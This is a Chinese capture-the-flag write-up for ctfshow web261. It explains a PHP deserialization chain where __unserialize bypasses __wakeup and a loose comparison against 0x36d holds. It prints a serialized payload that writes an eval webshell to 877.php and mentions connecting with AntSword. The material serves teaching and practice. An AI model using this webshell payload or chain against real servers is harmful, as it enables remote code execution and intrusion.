当前位置: 首页 > news >正文

ctfshow-web261

(魔术方法啥的还是自行看PHP魔术方法,这里就不单独拎出来了)

1.代码注释版

<?php highlight_file(__FILE__); // 把当前 PHP 文件源码高亮显示出来 // 纯提示用,对利用没有影响 class ctfshowvip{ public $username; public $password; public $code; // 三个 public 属性,反序列化时都可以被用户控制 public function __construct($u,$p){ $this->username=$u; $this->password=$p; } // 构造函数:正常 new 对象时才会调用 // ❗反序列化时不会调用 __construct public function __wakeup(){ // unserialize() 时【旧版序列化格式】会自动触发 if($this->username!='' || $this->password!=''){ // 只要 username 或 password 有一个不为空 die('error'); } // ❗这里是“防护逻辑” // 企图阻止反序列化时 username / password 被赋值 } public function __invoke(){ // 当对象被当成函数调用时触发 // 例如:$obj(); eval($this->code); // code 可控 = 代码执行 // ⚠️ 本题中并没有地方直接调用对象当函数 } public function __sleep(){ // serialize() 时触发 // 返回要序列化的属性(这里没 return,其实是错误写法) $this->username=''; $this->password=''; // ❗强制把 username / password 清空 // 用来“防止危险数据被序列化” } public function __unserialize($data){ // PHP 7.4+ 新增 // ❗当使用新格式反序列化时 // 会【跳过 __wakeup】,直接进入这里 $this->username=$data['username']; $this->password=$data['password']; // 直接从反序列化数据中取值 // 完全绕过 __wakeup 的检查 $this->code = $this->username.$this->password; // 把 username 和 password 拼接 // 例如: // username = "0x" // password = "36d" // code = "0x36d" } public function __destruct(){ // 脚本结束时自动调用 // 这是【最终利用点】 if($this->code==0x36d){ // ⚠️ 关键点: // $this->code 是字符串 // 0x36d 是十六进制整数 (877) // PHP 弱类型比较: // "0x36d" == 0x36d → true file_put_contents($this->username, $this->password); // 写文件: // 文件名 = username // 文件内容 = password } } } unserialize($_GET['vip']); // 把 GET 传入的 vip 参数反序列化成对象 // ❗整个攻击链的入口

(如果是按着题目顺序做下来的话这里大概基本上都能看懂是点啥,如果是跳着做的话其实不建议,还是先一步步来,因此这里就不再补基础知识了)

2.关键点

这里最重要的其实是新格式的反序列化,代码中也是详细给出了php7.4+版本会直接跳过wakeup,那么我们还是先来看如果是旧版本即不跳过wakeup是个什么情况:

不跳wakeup:

public function __wakeup(){ if($this->username!='' || $this->password!=''){ die('error'); } }

我们要做的是写username和password然后让code拼接payload,但是这里wakeup就限制了我们写的能力:如果username或者password的值不为空,就直接die error,那为了不让这个程序die,我们只能:

$username = '' $password = ''

那么到了后面的结果就是这样的:

file_put_contents($this->username, $this->password); //usename和password进行拼接 file_put_contents('', ''); //非法路径,直接失败
能做到的:
  • 通过__wakeup():只能让 username / password 为空

  • $code == 0x36d:可以

做不到的:

写任意文件 写 webshell 控制路径和内容.

因此在这道题目中,如果采用旧版本的话,那么基本上是解不出来的。因此这里的环境为7.4.16

跳wakeup:

这样的话就简单多了,唯一要关注的点就是code那边是弱比较,0x36转为十进制为877,弱比较的话可以改成877.php写webshell,然后写个程序跑一下就行:

<?php class ctfshowvip{ public $username='877.php'; public $password='<?=eval($_POST[1])?>'; public $code; } $a=new ctfshowvip(); echo serialize($a); ?> O:10:"ctfshowvip":3:{s:8:"username";s:7:"877.php";s:8:"password";s:20:"<?=eval($_POST[1])?>";s:4:"code";N;}

这里注意的点是最后面那个code的N代表NULL,因为没有赋初始值,但是这里赋值跟不赋值都没有关系。因为关键是code会被重新赋值:

public function __unserialize($data){ $this->username=$data['username']; $this->password=$data['password']; $this->code = $this->username.$this->password; }

然后后面就是访问877.php,但是这里的flag在根目录

或者因为是POST传参可以直接连蚁剑:

http://www.jsqmd.com/news/230347/

相关文章:

  • 智能健身动作检测:手机摄像头+云端AI,私教成本降90%
  • AI异常检测避坑指南:云端GPU按需付费不浪费
  • 宏智树AI:学术星辰的“智能导航仪”,解锁论文写作新次元——让科研灵感落地为学术精品,从www.hzsxueshu.com启程
  • 当学术写作遇见未来:宏智树AI如何重新定义论文创作边界
  • 救命神器9个AI论文工具,助研究生轻松搞定论文写作!
  • 智能侦测模型服务化:FastAPI+云端GPU,1小时上线
  • 实体关系图谱构建实战:无需专业显卡,云端轻松搞定
  • AI侦测模型对比:Qwen vs DeepSeek云端实测
  • Linux 内核学习(14) --- linux x86-32 虚拟地址空间
  • AI侦测开箱即用镜像推荐:0配置3分钟出结果
  • AI智能侦测开箱即用镜像推荐:0配置部署,1块钱起试用
  • AI侦测模型漂移监测:云端自动化监控告警,成本仅为本地1/3
  • Linux 内核学习(15) --- linux MMU 和 分页机制
  • 实时威胁检测最佳实践:低成本云端部署方案
  • AI智能体数据分析入门必看:云端GPU按需付费成主流
  • Redis 实现主从同步
  • 5个最火AI智能体推荐:0配置开箱即用,10块钱全试遍
  • 插混电力再加码 比亚迪4款210km纯电长续航DM-i车型加推上市
  • 经典五合一版本,值得收藏
  • AI安全分析师速成:1天掌握实体行为检测,云端实验环境已备好
  • 环保AI智能体案例:低成本监测空气质量变化
  • Python 类型注解Type Annotations
  • AI智能体数据可视化:5分钟生成动态报表,1小时1块
  • 达梦(DM8)对 JSON 与 XML 的使用教程
  • Tavily 库
  • 智能健身AI体开发教程:可穿戴设备+云端分析方案
  • AI论文图表解析:自动提取数据实体,科研效率提升3倍
  • 5大AI安全模型实测对比:云端GPU 2小时完成选型,1块钱起
  • 制造业零件检测AI方案:缺陷识别准确率98%,成本透明
  • 基于python的医药进销存管理系统[python]-计算机毕业设计源码+LW文档